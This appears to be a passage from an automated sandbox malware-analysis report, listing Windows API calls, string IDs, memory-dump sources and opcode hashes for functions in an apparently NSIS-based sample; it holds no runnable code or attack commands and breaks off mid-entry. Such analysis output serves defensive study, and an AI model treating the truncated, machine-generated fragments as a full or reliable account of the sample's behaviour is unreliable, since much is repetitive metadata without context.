                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s$@rD
                                                • API String ID: 3540041739-1813061909
                                                • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":
                                                • API String ID: 589700163-165019052
                                                • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                APIs
                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                APIs
                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                Strings
                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                • API String ID: 1697273262-1764544995
                                                • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00404902
                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID: $@rD
                                                • API String ID: 3748168415-881980237
                                                • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                APIs
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                  • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                • String ID: CopyFiles "%s"->"%s"
                                                • API String ID: 2577523808-3778932970
                                                • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: lstrcatwsprintf
                                                • String ID: %02x%c$...
                                                • API String ID: 3065427908-1057055748
                                                • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00405057
                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                • API String ID: 2266616436-4211696005
                                                • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                APIs
                                                • GetDC.USER32(?), ref: 00402100
                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                • String ID:
                                                • API String ID: 1599320355-0
                                                • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
